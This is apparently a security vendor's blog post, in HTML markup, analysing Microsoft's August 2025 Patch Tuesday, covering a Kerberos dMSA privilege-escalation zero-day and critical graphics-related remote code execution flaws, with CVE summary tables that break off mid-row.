      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is addressing 111 vulnerabilities this </span><a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Aug"><span style='font-size: undefined;'>August 2025 Patch Tuesday</span></a><span style='font-size: undefined;'>, a volume which is around the recent average. In a neat parallel with last month, Microsoft is aware of public disclosure for a single one of the vulnerabilities published today, and claims no evidence of in-the-wild exploitation. Once again, the lone Patch Tuesday zero-day vulnerability is assessed as only moderate severity at time of publication, which brings Microsoft’s lucky streak up to 11 months. Today’s release includes the publication of nine critical remote code execution (RCE) vulnerabilities, although Microsoft has only marked one of these as more likely to see exploitation. Eight browser vulnerabilities have already been published separately this month, and are not included in the total.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Kerberos: zero-day EoP</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>What do attackers want in a Windows context? Domain admin! When do they want it? Now! Today’s lone zero-day vulnerability might be just what they need to break through the final layers of protection and swipe the crown jewels. </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-53779"><span style='font-size: undefined;'>CVE-2025-53779</span></a><span style='font-size: undefined;'> is an elevation of privilege (EoP) vulnerability in the Windows implementation of Kerberos, which is enabled via abuse of dMSA configuration. The advisory FAQ provides more clues as to the nature of the attack than many comparable Microsoft advisories, but misses a golden opportunity for clarity, since it never sets out what it means by dMSA, leaving us scouring for contextual clues. Ultimately, we can determine from context that today’s hot topic is the </span><a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/delegated-managed-service-accounts/delegated-managed-service-accounts-overview"><span style='font-size: undefined;'>Delegated Managed Service Account</span></a><span style='font-size: undefined;'>, rather than the Defender Microservices Architecture or some other piece of Microsoft paraphernalia with matching initials. Microsoft’s motivation is unimpeachable: the dMSA supports automated rotation of credentials for service accounts, and is specifically designed to prevent credential harvesting using </span><a href="https://www.rapid7.com/fundamentals/kerberoasting-attack/"><span style='font-size: undefined;'>Kerberoasting</span></a><span style='font-size: undefined;'>. Indeed, </span><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-278a"><span style='font-size: undefined;'>CISA has described Kerberoasting</span></a><span style='font-size: undefined;'> as one of the most time-efficient ways to elevate privileges and move laterally throughout an organization’s network.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The good news here is that successful exploitation of </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-53779"><span style='font-size: undefined;'>CVE-2025-53779</span></a><span style='font-size: undefined;'> requires an attacker to have pre-existing control of two attributes of the hopefully well protected dMSA: </span><a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/c651f64d-5e92-4d12-9011-e6811ed306aa"><span style='font-size: undefined;'>msds-groupMSAMembership</span></a><span style='font-size: undefined;'>, which determines which users may use credentials for the managed service account, and </span><a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/6ce9e113-5c1e-4ba3-8078-419dd4e33561"><span style='font-size: undefined;'>msds-ManagedAccountPrecededByLink</span></a><span style='font-size: undefined;'>, which contains a list of users on whose behalf the dMSA can act. However, abuse of </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-53779"><span style='font-size: undefined;'>CVE-2025-53779</span></a><span style='font-size: undefined;'> is certainly plausible as the final link of a multi-exploit chain which stretches from no access to total pwnage. Finally, it’s important to note that Microsoft is only publishing patches for Windows Server 2025, and that’s because msds-ManagedAccountPrecededByLink was first implemented in Server 2025. Migrating to newer operating systems sooner rather than later remains good advice, but so is remediation of zero-day vulnerabilities which could give an attacker total control of your estate.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Windows Graphics: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The publication of any pre-authentication RCE in Windows will naturally spark discussion. Of course, not all pre-auth RCEs are created equal, and while </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-50165"><span style='font-size: undefined;'>CVE-2025-50165</span></a><span style='font-size: undefined;'> has a hefty CVSSv3 base score of 9.8, and is certainly a cause for concern, it is not the worst of the worst, since it presumably isn’t wormable. Despite that, a degree of alarm is amply justified, since the advisory FAQ mentions — twice! — that user interaction isn’t required. Exploitation is via a malicious JPEG file, which could be delivered within an Office document or other means; perhaps even visiting a website would be sufficient, or receiving an email within Outlook, although the advisory doesn’t explicitly confirm or deny these other possible attack routes. The malformed JPEG tricks the Windows Graphics Component into code execution via an untrusted pointer dereference. The context of execution isn’t specified, so in the standard spirit of caution, we’ll assume SYSTEM. This is hardly a new class of problem: we can cast our minds back a dozen years, for instance, and consider the broadly similar </span><a href="https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-096"><span style='font-size: undefined;'>MS13-096</span></a><span style='font-size: undefined;'>. However, the specific flaw underlying </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-50165"><span style='font-size: undefined;'>CVE-2025-50165</span></a><span style='font-size: undefined;'> is presumably a recent introduction, since only Windows 11 24H2 and Server 2025 receive patches. Patch this one sooner rather than later, since it could provide a skilled attacker with a valuable foothold from which to launch further attacks, including perhaps even today’s </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-53779"><span style='font-size: undefined;'>CVE-2025-53779</span></a><span style='font-size: undefined;'>.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Windows GDI+: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The Windows GDI+ (Graphics Device Interface Plus) is at the center of how almost all two-dimensional graphics are rendered on Windows assets. </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-53766"><span style='font-size: undefined;'>CVE-2025-53766</span></a><span style='font-size: undefined;'> is a critical RCE in how GDI+ interprets metafiles, which are often used to store vector graphics. An attacker can achieve code execution via buffer overflow without privileges or user interaction. As with today’s </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-50165"><span style='font-size: undefined;'>CVE-2025-50165</span></a><span style='font-size: undefined;'>, it’s unlikely that this vulnerability could be wormable, but the most alarming path to exploitation involved simply uploading a malicious metafile to a Windows machine running unspecified web services. There is no mention of SharePoint, Exchange, Office, or other non-Windows products in the Security Updates section of the advisory, but that still leaves an essentially limitless potential attack surface; for example, anyone running a custom ASP.NET application offering file uploads could find themselves vulnerable to an attacker wielding a dodgy WMF file. On the bright side, the Preview Pane is not a vector in this case. A patch is available for Server 2008, but not Server 2012, a curious and possibly concerning pattern that we see from time to time with RCEs which affect the full historic range of Windows products.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>DirectX graphics kernel: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Today is certainly a good day for fans of critical RCE vulnerabilities which target weaknesses in how Windows interprets graphics. Exploitation of </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-50176"><span style='font-size: undefined;'>CVE-2025-50176</span></a><span style='font-size: undefined;'>, a flaw in the DirectX graphics kernel, could lead to execution in a kernel context. Microsoft considers exploitation more likely, which may be why the advisory doesn’t provide a great deal of information about the means of exploitation, beyond a terse statement that type confusion is involved. Type confusion is where the kernel receives a pointer which it expects to be for one type of object, but is in fact for another, which is a bit like asking someone to read out loud from a restaurant menu, but then handing them their secret diary and hoping they won’t notice the difference. Most people will not be fooled, but under the right circumstances, anything is possible.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Microsoft lifecycle update</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>There are no significant changes to Microsoft product lifecycles this month. However, October will bring a flurry of changes, including the categorical </span><a href="https://support.microsoft.com/en-us/windows/windows-10-support-ends-on-october-14-2025-2ca8b313-1946-43d3-b55c-2b95b107f281"><span style='font-size: undefined;'>end of support for non-LTSC versions of Windows 10</span></a><span style='font-size: undefined;'>.</span></p><h2><span style='font-size: undefined;'>Summary charts</span></h2><h2><span style='font-size: undefined;'></span></h2><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6d2c4c88850f4100/689bb2412ac92281c5a8811a/2025-08-vuln_count_impact.png" alt="Microsoft Patch Tuesday August 2025: a bar chart showing vulnerability count by impact" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Microsoft Patch Tuesday August 2025: a bar chart showing vulnerability count by impact" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6d2c4c88850f4100/689bb2412ac92281c5a8811a/2025-08-vuln_count_impact.png" data-sys-asset-uid="blt6d2c4c88850f4100" data-sys-asset-filename="2025-08-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Microsoft Patch Tuesday August 2025: a bar chart showing vulnerability count by impact" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt18c243127d3a456d/689bb24128f7ab4b52d28955/2025-08-vuln_count_impact-component-heatmap.png" alt="Microsoft Patch Tuesday August 2025: a heatmap showing vulnerability count by component by impact" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Microsoft Patch Tuesday August 2025: a heatmap showing vulnerability count by component by impact" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt18c243127d3a456d/689bb24128f7ab4b52d28955/2025-08-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="blt18c243127d3a456d" data-sys-asset-filename="2025-08-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Microsoft Patch Tuesday August 2025: a heatmap showing vulnerability count by component by impact" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf898276858fcef6a/689bb241dac0e5d7eb3993c6/2025-08-vuln_count_component.png" alt="Microsoft Patch Tuesday August 2025: a bar chart showing vulnerability count by component" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Microsoft Patch Tuesday August 2025: a bar chart showing vulnerability count by component" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf898276858fcef6a/689bb241dac0e5d7eb3993c6/2025-08-vuln_count_component.png" data-sys-asset-uid="bltf898276858fcef6a" data-sys-asset-filename="2025-08-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Microsoft Patch Tuesday August 2025: a bar chart showing vulnerability count by component" data-sys-asset-position="center" sys-style-type="display"/></figure><h2>Summary tables</h2><p></p><h3>Apps vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53787">CVE-2025-53787</a></td><td><p>Microsoft 365 Copilot BizChat Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.2</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53774">CVE-2025-53774</a></td><td><p>Microsoft 365 Copilot BizChat Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr></tbody></table><h3>Azure vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53767">CVE-2025-53767</a></td><td><p>Azure OpenAI Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>10</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53792">CVE-2025-53792</a></td><td><p>Azure Portal Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49707">CVE-2025-49707</a></td><td><p>Azure Virtual Machines Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.9</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53729">CVE-2025-53729</a></td><td><p>Microsoft Azure File Sync Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53781">CVE-2025-53781</a></td><td><p>Azure Virtual Machines Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53793">CVE-2025-53793</a></td><td><p>Azure Stack Hub Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53765">CVE-2025-53765</a></td><td><p>Azure Stack Hub Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.4</p></td></tr></tbody></table><h3>Browser vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49736">CVE-2025-49736</a></td><td><p>Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49755">CVE-2025-49755</a></td><td><p>Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-8583">CVE-2025-8583</a></td><td><p>Chromium: CVE-2025-8583 Inappropriate implementation in Permissions</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-8582">CVE-2025-8582</a></td><td><p>Chromium: CVE-2025-8582 Insufficient validation of untrusted input in DOM</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-8581">CVE-2025-8581</a></td><td><p>Chromium: CVE-2025-8581 Inappropriate implementation in Extensions</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-8580">CVE-2025-8580</a></td><td><p>Chromium: CVE-2025-8580 Inappropriate implementation in Filesystems</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-8579">CVE-2025-8579</a></td><td><p>Chromium: CVE-2025-8579 Inappropriate implementation in Gemini Live in Chrome</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-8578">CVE-2025-8578</a></td><td><p>Chromium: CVE-2025-8578 Use after free in Cast</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-8577">CVE-2025-8577</a></td><td><p>Chromium: CVE-2025-8577 Inappropriate implementation in Picture In Picture</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-8576">CVE-2025-8576</a></td><td><p>Chromium: CVE-2025-8576 Use after free in Extensions</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr></tbody></table><h3>Developer Tools vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53772">CVE-2025-53772</a></td><td><p>Web Deploy Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53773">CVE-2025-53773</a></td><td><p>GitHub Copilot and Visual Studio Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><h3>Device Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53783">CVE-2025-53783</a></td><td><p>Microsoft Teams Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr></tbody></table><h3>ESU Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49757">CVE-2025-49757</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50163">CVE-2025-50163</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53778">CVE-2025-53778</a></td><td><p>Windows NTLM Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53143">CVE-2025-53143</a></td><td><p>Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53144">CVE-2025-53144</a></td><td><p>Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53145">CVE-2025-53145</a></td><td><p>Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50177">CVE-2025-50177</a></td><td><p>Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50160">CVE-2025-50160</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50162">CVE-2025-50162</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50164">CVE-2025-50164</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53720">CVE-2025-53720</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53132">CVE-2025-53132</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53724">CVE-2025-53724</a></td><td><p>Windows Push Notifications Apps Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53725">CVE-2025-53725</a></td><td><p>Windows Push Notifications Apps Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53726">CVE-2025-53726</a></td><td><p>Windows Push Notifications Apps Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50155">CVE-2025-50155</a></td><td><p>Windows Push Notifications Apps Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49761">CVE-2025-49761</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50173">CVE-2025-50173</a></td><td><p>Windows Installer Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53155">CVE-2025-53155</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53723">CVE-2025-53723</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53141">CVE-2025-53141</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53154">CVE-2025-53154</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53149">CVE-2025-53149</a></td><td><p>Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53152">CVE-2025-53152</a></td><td><p>Desktop Windows Manager Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50153">CVE-2025-50153</a></td><td><p>Desktop Windows Manager Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53722">CVE-2025-53722</a></td><td><p>Windows Remote Desktop Services Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50154">CVE-2025-50154</a></td><td><p>Microsoft Windows File Explorer Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50161">CVE-2025-50161</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50159">CVE-2025-50159</a></td><td><p>Remote Access Point-to-Point Protocol (PPP) EAP-TLS Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50158">CVE-2025-50158</a></td><td><p>Windows NTFS Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53140">CVE-2025-53140</a></td><td><p>Windows Kernel Transaction Manager Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50167">CVE-2025-50167</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49762">CVE-2025-49762</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53134">CVE-2025-53134</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53137">CVE-2025-53137</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53147">CVE-2025-53147</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53718">CVE-2025-53718</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53135">CVE-2025-53135</a></td><td><p>DirectX Graphics Kernel Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49743">CVE-2025-49743</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50166">CVE-2025-50166</a></td><td><p>Windows Distributed Transaction Coordinator (MSDTC) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50156">CVE-2025-50156</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53138">CVE-2025-53138</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53148">CVE-2025-53148</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53153">CVE-2025-53153</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53719">CVE-2025-53719</a></td><td><p>Windows Routing and 